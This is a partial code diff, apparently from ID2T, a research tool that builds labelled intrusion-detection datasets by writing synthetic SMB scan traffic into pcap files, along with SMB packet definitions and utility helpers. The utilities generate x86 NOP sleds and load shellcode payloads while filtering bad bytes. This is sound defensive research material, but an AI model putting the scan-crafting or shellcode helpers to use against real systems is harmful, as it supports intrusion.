+                request.time = timestamp_next_pkt
+
+                # Append request
+                packets.append(request)
+
+                # Update timestamp for next package
+                timestamp_reply = update_timestamp(timestamp_next_pkt, pps, minDelay)
+                while (timestamp_reply <= timestamp_prv_reply):
+                    timestamp_reply = update_timestamp(timestamp_prv_reply, pps, minDelay)
+                timestamp_prv_reply = timestamp_reply
+
+                if ip in hosting_ip:
+
+                    # 2) Build TCP packages for ip that hosts SMB
+
+                    # destination sends SYN, ACK
+                    reply_ether = Ether(src=mac_destination, dst=mac_source)
+                    reply_ip = IP(src=ip, dst=ip_source, ttl=destination_ttl_value, flags='DF')
+                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq, flags='SA',
+                                    window=destination_win_value, options=[('MSS', destination_mss_value)])
+                    victim_seq += 1
+                    reply = (reply_ether / reply_ip / reply_tcp)
+                    reply.time = timestamp_reply
+                    packets.append(reply)
+
+                    # requester confirms, ACK
+                    confirm_ether = request_ether
+                    confirm_ip = request_ip
+                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
+                                      window=source_win_value, flags='A')
+                    confirm = (confirm_ether / confirm_ip / confirm_tcp)
+                    timestamp_confirm = update_timestamp(timestamp_reply, pps, minDelay)
+                    confirm.time = timestamp_confirm
+                    packets.append(confirm)
+
+                    smb_MID = randint(1, 65535)
+                    smb_PID = randint(1, 65535)
+                    smb_req_tail_arr = []
+                    smb_req_tail_size = 0
+
+                    # select dialects based on smb version
+                    if smb_version is "1":
+                        smb_req_dialects = smb_dialects[0:6]
+                    else:
+                        smb_req_dialects = smb_dialects
+                    if len(smb_req_dialects) == 0:
+                        smb_req_tail_arr.append(SMBNegociate_Protocol_Request_Tail())
+                        smb_req_tail_size = len(SMBNegociate_Protocol_Request_Tail())
+                    else:
+                        for dia in smb_req_dialects:
+                            smb_req_tail_arr.append(SMBNegociate_Protocol_Request_Tail(BufferData = dia))
+                            smb_req_tail_size += len(SMBNegociate_Protocol_Request_Tail(BufferData = dia))
+
+                    smb_req_head = SMBNegociate_Protocol_Request_Header\
+                        (Flags2=0x2801, PID=smb_PID, MID=smb_MID, ByteCount=smb_req_tail_size)
+                    smb_req_length = len(smb_req_head) + smb_req_tail_size
+                    smb_req_net_bio = NBTSession(TYPE=0x00, LENGTH=smb_req_length)
+                    smb_req_tcp = TCP(sport=sport, dport=smb_port, flags='PA', seq=attacker_seq, ack=victim_seq)
+                    smb_req_ip = IP(src=ip_source, dst=ip, ttl=source_ttl_value)
+                    smb_req_ether = Ether(src=mac_source, dst=mac_destination)
+                    attacker_seq += len(smb_req_net_bio) + len(smb_req_head) + smb_req_tail_size
+
+                    smb_req_combined = (smb_req_ether / smb_req_ip / smb_req_tcp / smb_req_net_bio / smb_req_head)
+
+                    for i in range(0 , len(smb_req_tail_arr)):
+                        smb_req_combined = smb_req_combined / smb_req_tail_arr[i]
+
+                    timestamp_smb_req = update_timestamp(timestamp_confirm, pps, minDelay)
+                    smb_req_combined.time = timestamp_smb_req
+                    packets.append(smb_req_combined)
+
+                    # destination confirms SMB request package
+                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq,
+                                    window=destination_win_value, flags='A')
+                    confirm_smb_req = (reply_ether / reply_ip / reply_tcp)
+                    timestamp_reply = update_timestamp(timestamp_smb_req, pps, minDelay)
+                    confirm_smb_req.time = timestamp_reply
+                    packets.append(confirm_smb_req)
+
+                    # smb response package
+                    first_timestamp = time.mktime(time.strptime(self.statistics.get_pcap_timestamp_start()[:19],
+                                                                "%Y-%m-%d %H:%M:%S"))
+                    server_Guid, security_blob, capabilities, data_size, server_start_time = get_smb_platform_data\
+                        (self.host_os, first_timestamp)
+
+                    timestamp_smb_rsp = update_timestamp(timestamp_reply, pps, minDelay)
+                    diff = timestamp_smb_rsp - timestamp_smb_req
+                    begin = get_filetime_format(timestamp_smb_req+diff*0.1)
+                    end = get_filetime_format(timestamp_smb_rsp-diff*0.1)
+                    system_time = randint(begin, end)
+
+                    if smb_version is not "1" and hosting_version is not "1":
+                        smb_rsp_paket = SMB2_SYNC_Header(Flags = 1)
+                        smb_rsp_negotiate_body = SMB2_Negotiate_Protocol_Response\
+                            (DialectRevision=0x02ff, SecurityBufferOffset=124, SecurityBufferLength=len(security_blob),
+                             SecurityBlob=security_blob, Capabilities=capabilities, MaxTransactSize=data_size,
+                             MaxReadSize=data_size, MaxWriteSize=data_size, SystemTime=system_time,
+                             ServerStartTime=server_start_time, ServerGuid=server_Guid)
+                        smb_rsp_length = len(smb_rsp_paket) + len(smb_rsp_negotiate_body)
+                    else:
+                        smb_rsp_paket = SMBNegociate_Protocol_Response_Advanced_Security\
+                            (Start="\xffSMB", PID=smb_PID, MID=smb_MID, DialectIndex=5, SecurityBlob=security_blob)
+                        smb_rsp_length = len(smb_rsp_paket)
+                    smb_rsp_net_bio = NBTSession(TYPE=0x00, LENGTH=smb_rsp_length)
+                    smb_rsp_tcp = TCP(sport=smb_port, dport=sport, flags='PA', seq=victim_seq, ack=attacker_seq)
+                    smb_rsp_ip = IP(src=ip, dst=ip_source, ttl=destination_ttl_value)
+                    smb_rsp_ether = Ether(src=mac_destination, dst=mac_source)
+                    victim_seq += len(smb_rsp_net_bio) + len(smb_rsp_paket)
+                    if smb_version is not "1"and hosting_version is not "1":
+                        victim_seq += len(smb_rsp_negotiate_body)
+
+                    smb_rsp_combined = (smb_rsp_ether / smb_rsp_ip / smb_rsp_tcp / smb_rsp_net_bio / smb_rsp_paket)
+                    if smb_version is not "1"and hosting_version is not "1":
+                        smb_rsp_combined = (smb_rsp_combined / smb_rsp_negotiate_body)
+
+                    smb_rsp_combined.time = timestamp_smb_rsp
+                    packets.append(smb_rsp_combined)
+
+
+                    # source confirms SMB response package
+                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
+                                      window=source_win_value, flags='A')
+                    confirm_smb_res = (confirm_ether / confirm_ip / confirm_tcp)
+                    timestamp_confirm = update_timestamp(timestamp_smb_rsp, pps, minDelay)
+                    confirm_smb_res.time = timestamp_confirm
+                    packets.append(confirm_smb_res)
+
+                    # attacker sends FIN ACK
+                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
+                                      window=source_win_value, flags='FA')
+                    source_fin_ack = (confirm_ether / confirm_ip / confirm_tcp)
+                    timestamp_src_fin_ack = update_timestamp(timestamp_confirm, pps, minDelay)
+                    source_fin_ack.time = timestamp_src_fin_ack
+                    attacker_seq += 1
+                    packets.append(source_fin_ack)
+
+                    # victim sends FIN ACK
+                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq,
+                                    window=destination_win_value, flags='FA')
+                    destination_fin_ack = (reply_ether / reply_ip / reply_tcp)
+                    timestamp_dest_fin_ack = update_timestamp(timestamp_src_fin_ack, pps, minDelay)
+                    victim_seq += 1
+                    destination_fin_ack.time = timestamp_dest_fin_ack
+                    packets.append(destination_fin_ack)
+
+                    # source sends final ACK
+                    confirm_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq,
+                                      window=source_win_value, flags='A')
+                    final_ack = (confirm_ether / confirm_ip / confirm_tcp)
+                    timestamp_final_ack = update_timestamp(timestamp_dest_fin_ack, pps, minDelay)
+                    final_ack.time = timestamp_final_ack
+                    packets.append(final_ack)
+
+                else:
+                    # Build RST package
+                    reply_ether = Ether(src=mac_destination, dst=mac_source)
+                    reply_ip = IP(src=ip, dst=ip_source, ttl=destination_ttl_value, flags='DF')
+                    reply_tcp = TCP(sport=smb_port, dport=sport, seq=0, ack=attacker_seq, flags='RA',
+                                    window=destination_win_value, options=[('MSS', destination_mss_value)])
+                    reply = (reply_ether / reply_ip / reply_tcp)
+                    reply.time = timestamp_reply
+                    packets.append(reply)
+
+            pps = max(get_interval_pps(complement_interval_pps, timestamp_next_pkt), 10)
+            timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
+
+        # store end time of attack
+        self.attack_end_utime = packets[-1].time
+
+        # write attack packets to pcap
+        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))
+
+        # return packets sorted by packet time_sec_start
+        return len(packets), pcap_path

+ 32 - 0
code/ID2TLib/Label.py

@@ -0,0 +1,32 @@
+from functools import total_ordering
+
+
+@total_ordering
+class Label:
+    def __init__(self, attack_name, timestamp_start, timestamp_end, attack_note=""):
+        """
+        Creates a new attack label
+
+        :param attack_name: The name of the associated attack
+        :param timestamp_start: The timestamp as unix time of the first attack packet
+        :param timestamp_end: The timestamp as unix time of the last attack packet
+        :param attack_note: A note associated to the attack (optional)
+        """
+        self.attack_name = attack_name
+        self.timestamp_start = timestamp_start
+        self.timestamp_end = timestamp_end
+        self.attack_note = attack_note
+
+    def __eq__(self, other):
+        return self.timestamp == other.timestamp
+
+    def __lt__(self, other):
+        return self.timestamp_start < other.timestamp_start
+
+    def __gt__(self, other):
+        return self.timestamp_start > other.timestamp_start
+
+    def __str__(self):
+        return ''.join(
+            ['(', self.attack_name, ',', self.attack_note, ',', str(self.timestamp_start), ',', str(self.timestamp_end),
+             ')'])

+ 45 - 0
code/ID2TLib/SMB2.py

@@ -0,0 +1,45 @@
+from scapy.packet import *
+from scapy.fields import *
+from scapy.layers.netbios import NBTSession
+
+
+class SMB2_SYNC_Header(Packet):
+    namez = "SMB2Negociate Protocol Response Header"
+    fields_desc = [StrFixedLenField("Start","\xfeSMB", 4),
+                   LEShortField("StructureSize", 64),
+                   LEShortField("CreditCharge", 0),
+                   LEIntField("Status", 0),
+                   LEShortField("Command", 0),
+                   LEShortField("CreditResponse", 0),
+                   LEIntField("Flags", 0),
+                   LEIntField("NextCommand", 0),
+                   LELongField("MessageID", 0),
+                   LEIntField("Reserved", 0),
+                   LEIntField("TreeID", 0x0),
+                   LELongField("SessionID", 0),
+                   LELongField("Signature1", 0),
+                   LELongField("Signature2", 0)]
+
+
+#No Support of Security Buffer , Padding or Dialect Revision 0x0311
+class SMB2_Negotiate_Protocol_Response(Packet):
+    namez = "SMB2Negociate Protocol Response"
+    fields_desc = [LEShortField("StructureSize", 65),
+                   LEShortField("SecurityMode", 0),
+                   LEShortField("DialectRevision", 0x0),
+                   LEShortField("NegotiateContentCount/Reserved", 0),
+                   StrFixedLenField("ServerGuid", "", 16),
+                   LEIntField("Capabilities", 0),
+                   LEIntField("MaxTransactSize", 0),
+                   LEIntField("MaxReadSize", 0),
+                   LEIntField("MaxWriteSize", 0),
+                   LELongField("SystemTime", 0),
+                   LELongField("ServerStartTime", 0),
+                   LEShortField("SecurityBufferOffset", 0),
+                   LEShortField("SecurityBufferLength", 0),
+                   StrLenField("SecurityBlob", "", length_from=lambda x: x.ByteCount + 16),
+                   LEIntField("NegotiateContextOffset/Reserved2", 0)]
+
+
+bind_layers(NBTSession, SMB2_SYNC_Header,)
+bind_layers(SMB2_SYNC_Header, SMB2_Negotiate_Protocol_Response,)

+ 108 - 0
code/ID2TLib/SMBLib.py

@@ -0,0 +1,108 @@
+from os import urandom
+from binascii import b2a_hex
+from random import random
+
+from ID2TLib.Utility import check_platform, get_filetime_format, get_rnd_boot_time
+
+# SMB port
+smb_port = 445
+
+# SMB versions
+smb_versions = {"1", "2.0", "2.1", "3.0", "3.0.2", "3.1.1"}
+smb_versions_per_win = {'win7': "2.1", 'win10': "3.1.1", 'winxp': "1", 'win8.1': "3.0.2", 'win8': "3.0",
+                        'winvista': "2.0", 'winnt': "1", "win2000": "1"}
+smb_versions_per_samba = {'3.6': "2.0", '4.0': "2.1", '4.1': "3.0", '4.3': "3.1.1"}
+# SMB dialects
+smb_dialects = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1",
+                "NT LM 0.12", "SMB 2.002", "SMB 2.???"]
+# SMB security blobs
+security_blob_windows = "\x60\x82\x01\x3c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x82\x01\x30" \
+                        "\x30\x82\x01\x2c\xa0\x1a\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82" \
+                        "\x37\x02\x02\x1e\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a" \
+                        "\xa2\x82\x01\x0c\x04\x82\x01\x08\x4e\x45\x47\x4f\x45\x58\x54\x53" \
+                        "\x01\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x70\x00\x00\x00" \
+                        "\xbc\x84\x03\x97\x6f\x80\x3b\x81\xa6\x45\x1b\x05\x92\x39\xde\x3d" \
+                        "\xd6\x91\x85\x49\x8a\xd0\x3b\x58\x87\x99\xb4\x98\xdf\xa6\x1d\x73" \
+                        "\x3b\x57\xbf\x05\x63\x5e\x30\xea\xa8\xd8\xd8\x45\xba\x80\x52\xa5" \
+                        "\x00\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00" \
+                        "\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x33\x53\x0d\xea\xf9\x0d\x4d" \
+                        "\xb2\xec\x4a\xe3\x78\x6e\xc3\x08\x4e\x45\x47\x4f\x45\x58\x54\x53" \
+                        "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x98\x00\x00\x00" \
+                        "\xbc\x84\x03\x97\x6f\x80\x3b\x81\xa6\x45\x1b\x05\x92\x39\xde\x3d" \
+                        "\x5c\x33\x53\x0d\xea\xf9\x0d\x4d\xb2\xec\x4a\xe3\x78\x6e\xc3\x08" \
+                        "\x40\x00\x00\x00\x58\x00\x00\x00\x30\x56\xa0\x54\x30\x52\x30\x27" \
+                        "\x80\x25\x30\x23\x31\x21\x30\x1f\x06\x03\x55\x04\x03\x13\x18\x54" \
+                        "\x6f\x6b\x65\x6e\x20\x53\x69\x67\x6e\x69\x6e\x67\x20\x50\x75\x62" \
+                        "\x6c\x69\x63\x20\x4b\x65\x79\x30\x27\x80\x25\x30\x23\x31\x21\x30" \
+                        "\x1f\x06\x03\x55\x04\x03\x13\x18\x54\x6f\x6b\x65\x6e\x20\x53\x69" \
+                        "\x67\x6e\x69\x6e\x67\x20\x50\x75\x62\x6c\x69\x63\x20\x4b\x65\x79"
+security_blob_ubuntu = "\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e" \
+                       "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa3\x2a" \
+                       "\x30\x28\xa0\x26\x1b\x24\x6e\x6f\x74\x5f\x64\x65\x66\x69\x6e\x65" \
+                       "\x64\x5f\x69\x6e\x5f\x52\x46\x43\x34\x31\x37\x38\x40\x70\x6c\x65" \
+                       "\x61\x73\x65\x5f\x69\x67\x6e\x6f\x72\x65"
+security_blob_macos = "\x60\x7e\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x74\x30\x72\xa0\x44" \
+                      "\x30\x42\x06\x09\x2a\x86\x48\x82\xf7\x12\x01\x02\x02\x06\x09\x2a" \
+                      "\x86\x48\x86\xf7\x12\x01\x02\x02\x06\x06\x2a\x85\x70\x2b\x0e\x03" \
+                      "\x06\x06\x2b\x06\x01\x05\x05\x0e\x06\x0a\x2b\x06\x01\x04\x01\x82" \
+                      "\x37\x02\x02\x0a\x06\x06\x2b\x05\x01\x05\x02\x07\x06\x06\x2b\x06" \
+                      "\x01\x05\x02\x05\xa3\x2a\x30\x28\xa0\x26\x1b\x24\x6e\x6f\x74\x5f" \
+                      "\x64\x65\x66\x69\x6e\x65\x64\x5f\x69\x6e\x5f\x52\x46\x43\x34\x31" \
+                      "\x37\x38\x40\x70\x6c\x65\x61\x73\x65\x5f\x69\x67\x6e\x6f\x72\x65"
+
+
+def get_smb_version(platform: str):
+    """
+    Returns SMB version based on given platform
+
+    :param platform: the platform as string
+    :return: SMB version as string
+    """
+    check_platform(platform)
+    if platform is "linux":
+        return random.choice(list(smb_versions_per_samba.values()))
+    elif platform is "macos":
+        return "2.1"
+    else:
+        return smb_versions_per_win[platform]
+
+
+def get_smb_platform_data(platform: str, timestamp: float):
+    """
+    Gets platform-dependent data for SMB 2 packets
+
+    :param platform: the platform for which to get SMB 2 packet data
+    :param timestamp: a timestamp for calculating the boot-time
+    :return: server_guid, security_blob, capabilities, data_size and server_start_time of the given platform
+    """
+    check_platform(platform)
+    if platform == "linux":
+        server_guid = "ubuntu"
+        security_blob = security_blob_ubuntu
+        capabilities = 0x5
+        data_size = 0x800000
+        server_start_time = 0
+    elif platform == "macos":
+        server_guid = b2a_hex(urandom(15)).decode()
+        security_blob = security_blob_macos
+        capabilities = 0x6
+        data_size = 0x400000
+        server_start_time = 0
+    else:
+        server_guid = b2a_hex(urandom(15)).decode()
+        security_blob = security_blob_windows
+        capabilities = 0x7
+        data_size = 0x100000
+        server_start_time = get_filetime_format(get_rnd_boot_time(timestamp))
+    return server_guid, security_blob, capabilities, data_size, server_start_time
+
+
+def invalid_smb_version(version: str):
+    """
+    Prints an error and exits
+
+    :param version: the invalid SMB
+    """
+    print("\nInvalid smb version: " + version +
+          "\nPlease select one of the following versions: ", smb_versions)
+    exit(1)

+ 269 - 0
code/ID2TLib/Utility.py

@@ -0,0 +1,269 @@
+import ipaddress
+
+from random import randint, uniform
+from os import urandom
+from datetime import datetime
+from calendar import timegm
+from lea import Lea
+
+platforms = {"win7", "win10", "winxp", "win8.1", "macos", "linux", "win8", "winvista", "winnt", "win2000"}
+platform_probability = {"win7": 48.43, "win10": 27.99, "winxp": 6.07, "win8.1": 6.07, "macos": 5.94, "linux": 3.38,
+                        "win8": 1.35, "winvista": 0.46, "winnt": 0.31}
+
+x86_nops = {b'\x90', b'\xfc', b'\xfd', b'\xf8', b'\xf9', b'\xf5', b'\x9b'}
+x86_pseudo_nops = {b'\x97', b'\x96', b'\x95', b'\x93', b'\x92', b'\x91', b'\x99', b'\x4d', b'\x48', b'\x47', b'\x4f',
+                   b'\x40', b'\x41', b'\x37', b'\x3f', b'\x27', b'\x2f', b'\x46', b'\x4e', b'\x98', b'\x9f', b'\x4a',
+                   b'\x44', b'\x42', b'\x43', b'\x49', b'\x4b', b'\x45', b'\x4c', b'\x60', b'\x0e', b'\x1e', b'\x50',
+                   b'\x55', b'\x53', b'\x51', b'\x57', b'\x52', b'\x06', b'\x56', b'\x54', b'\x16', b'\x58', b'\x5d',
+                   b'\x5b', b'\x59', b'\x5f', b'\x5a', b'\x5e', b'\xd6'}
+forbidden_chars = [b'\x00', b'\x0a', b'\x0d']
+
+
+def update_timestamp(timestamp, pps, delay=0):
+    """
+    Calculates the next timestamp to be used based on the packet per second rate (pps) and the maximum delay.
+
+    :return: Timestamp to be used for the next packet.
+    """
+    if delay == 0:
+        # Calculate request timestamp
+        # To imitate the bursty behavior of traffic
+        randomdelay = Lea.fromValFreqsDict({1 / pps: 70, 2 / pps: 20, 5 / pps: 7, 10 / pps: 3})
+        return timestamp + uniform(1 / pps, randomdelay.random())
+    else:
+        # Calculate reply timestamp
+        randomdelay = Lea.fromValFreqsDict({2 * delay: 70, 3 * delay: 20, 5 * delay: 7, 10 * delay: 3})
+        return timestamp + uniform(1 / pps + delay, 1 / pps + randomdelay.random())
+
+
+def get_interval_pps(complement_interval_pps, timestamp):
+    """
+    Gets the packet rate (pps) for a specific time interval.
+
+    :param complement_interval_pps: an array of tuples (the last timestamp in the interval, the packet rate in the
+    corresponding interval).
+    :param timestamp: the timestamp at which the packet rate is required.
+    :return: the corresponding packet rate (pps) .
+    """
+    for row in complement_interval_pps:
+        if timestamp<=row[0]:
+            return row[1]
+    return complement_interval_pps[-1][1] # in case the timstamp > capture max timestamp
+
+
+def get_nth_random_element(*element_list):
+    """
+    Returns the n-th element of every list from an arbitrary number of given lists.
+    For example, list1 contains IP addresses, list 2 contains MAC addresses. Use of this function ensures that
+    the n-th IP address uses always the n-th MAC address.
+    :param element_list: An arbitrary number of lists.
+    :return: A tuple of the n-th element of every list.
+    """
+    range_max = min([len(x) for x in element_list])
+    if range_max > 0: range_max -= 1
+    n = randint(0, range_max)
+    return tuple(x[n] for x in element_list)
+
+
+def index_increment(number: int, max: int):
+            if number + 1 < max:
+                return number + 1
+            else:
+                return 0
+
+
+def get_rnd_os():
+    """
+    Chooses random platform over an operating system probability distribution
+
+    :return: random platform as string
+    """
+    os_dist = Lea.fromValFreqsDict(platform_probability)
+    return os_dist.random()
+
+
+def check_platform(platform: str):
+    """
+    Checks if the given platform is currently supported
+    if not exits with error
+
+    :param platform: the platform, which should be validated
+    """
+    if platform not in platforms:
+        print("\nERROR: Invalid platform: " + platform + "." +
+              "\n Please select one of the following platforms: ", platforms)
+        exit(1)
+
+
+def get_ip_range(start_ip: str, end_ip: str):
+    """
+    Generates a list of IPs of a given range. If the start_ip is greater than the end_ip, the reverse range is generated
+
+    :param start_ip: the start_ip of the desired IP-range
+    :param end_ip:  the end_ip of the desired IP-range
+    :return: a list of all IPs in the desired IP-range, including start-/end_ip
+    """
+    start = ipaddress.ip_address(start_ip)
+    end = ipaddress.ip_address(end_ip)
+    ips = []
+    if start < end:
+        while start <= end:
+            ips.append(start.exploded)
+            start = start+1
+    elif start > end:
+        while start >= end:
+            ips.append(start.exploded)
+            start = start-1
+    else:
+        ips.append(start_ip)
+    return ips
+
+
+def generate_source_port_from_platform(platform: str, previousPort=0):
+    """
+    Generates the next source port according to the TCP-port-selection strategy of the given platform
+
+    :param platform: the platform for which to generate source ports
+    :param previousPort: the previously used/generated source port. Must be 0 if no port was generated before
+    :return: the next source port for the given platform
+    """
+    check_platform(platform)
+    if platform in {"winnt", "winxp", "win2000"}:
+        if (previousPort == 0) or (previousPort + 1 > 5000):
+            return randint(1024, 5000)
+        else:
+            return previousPort + 1
+    elif platform == "linux":
+        return randint(32768, 61000)
+    else:
+        if (previousPort == 0) or (previousPort + 1 > 65535):
+            return randint(49152, 65535)
+        else:
+            return previousPort + 1
+
+
+def get_filetime_format(timestamp):
+    """
+    Converts a timestamp into MS FILETIME format
+
+    :param timestamp: a timestamp in seconds
+    :return: MS FILETIME timestamp
+    """
+    boot_datetime = datetime.fromtimestamp(timestamp)
+    if boot_datetime.tzinfo is None or boot_datetime.tzinfo.utcoffset(boot_datetime) is None:
+        boot_datetime = boot_datetime.replace(tzinfo=boot_datetime.tzname())
+    boot_filetime = 116444736000000000 + (timegm(boot_datetime.timetuple()) * 10000000)
+    return boot_filetime + (boot_datetime.microsecond * 10)
+
+
+def get_rnd_boot_time(timestamp, platform="winxp"):
+    """
+    Generates a random boot time based on a given timestamp and operating system
+
+    :param timestamp: a timestamp in seconds
+    :param platform: a platform as string as specified in check_platform above. default is winxp. this param is optional
+    :return: timestamp of random boot time in seconds since EPOCH
+    """
+    check_platform(platform)
+    if platform is "linux":
+        uptime_in_days = Lea.fromValFreqsDict({3: 50, 7: 25, 14: 12.5, 31: 6.25, 92: 3.125, 183: 1.5625,
+                                               365: 0.78125, 1461: 0.390625, 2922: 0.390625})
+    elif platform is "macos":
+        uptime_in_days = Lea.fromValFreqsDict({7: 50, 14: 25, 31: 12.5, 92: 6.25, 183: 3.125, 365: 3.076171875,
+                                               1461: 0.048828125})
+    else:
+        uptime_in_days = Lea.fromValFreqsDict({3: 50, 7: 25, 14: 12.5, 31: 6.25, 92: 3.125, 183: 1.5625,
+                                               365: 0.78125, 1461: 0.78125})
+    timestamp -= randint(0, uptime_in_days.random()*86400)
+    return timestamp
+
+
+def get_rnd_x86_nop(count=1, side_effect_free=False, char_filter=set()):
+    """
+    Generates a specified number of x86 single-byte (pseudo-)NOPs
+
+    :param count: The number of bytes to generate
+    :param side_effect_free: Determines whether NOPs with side-effects (to registers or the stack) are allowed
+    :param char_filter: A set of bytes which are forbidden to generate
+    :return: Random x86 NOP bytestring
+    """
+    result = b''
+    nops = x86_nops
+    if not side_effect_free:
+        nops |= x86_pseudo_nops
+
+    if not isinstance(char_filter, set):
+        char_filter = set(char_filter)
+    nops = list(nops-char_filter)
+
+    for i in range(0, count):
+        result += nops[randint(0, len(nops) - 1)]
+    return result
+
+
+def get_rnd_bytes(count=1, ignore=None):
+    """
+    Generates a specified number of random bytes while excluding unwanted bytes
+
+    :param count: Number of wanted bytes
+    :param ignore: The bytes, which should be ignored, as an array
+    :return: Random bytestring
+    """
+    if ignore is None:
+        ignore = []
+    result = b''
+    for i in range(0, count):
+        char = urandom(1)
+        while char in ignore:
+            char = urandom(1)
+        result += char
+    return result
+
+
+def get_bytes_from_file(filepath):
+    """
+    Converts the content of a file into its byte representation
+    The content of the file can either be a string or hexadecimal numbers/bytes (e.g. shellcode)
+    The file must have the keyword "str" or "hex" in its first line to specify the rest of the content
+    If the content is hex, whitespaces, backslashes, "x", quotation marks and "+" are removed
+    Example for a hexadecimal input file:
+
+        hex
+        "abcd ef \xff10\ff 'xaa' x \ ab"
+
+    Output: b'\xab\xcd\xef\xff\x10\xff\xaa\xab'
+
+    :param filepath: The path of the file from which to get the bytes
+    :return: The bytes of the file (either a byte representation of a string or the bytes contained in the file)
+    """
+    try:
+        file = open(filepath)
+        result_bytes = b''
+        header = file.readline().strip()
+        content = file.read()
+
+        if header == "hex":
+            content = content.replace(" ", "").replace("\n", "").replace("\\", "").replace("x", "").replace("\"", "")\
+                .replace("'", "").replace("+", "").replace("\r", "")
+            try:
+                result_bytes = bytes.fromhex(content)
+            except ValueError:
+                print("\nERROR: Content of file is not all hexadecimal.")
+                exit(1)
+        elif header == "str":
+            result_bytes = content.encode()
+        else:
+            print("\nERROR: Invalid header found: " + header + ". Try 'hex' or 'str' followed by endline instead.")
+            exit(1)
+
+        for forbidden_char in forbidden_chars:
+            if forbidden_char in result_bytes:
+                print("\nERROR: Forbidden character found in payload: ", forbidden_char)
+                exit(1)
+
+        file.close()
+        return result_bytes
+
+    except FileNotFoundError:
+        print("\nERROR: File not found: ", filepath)
+        exit(1)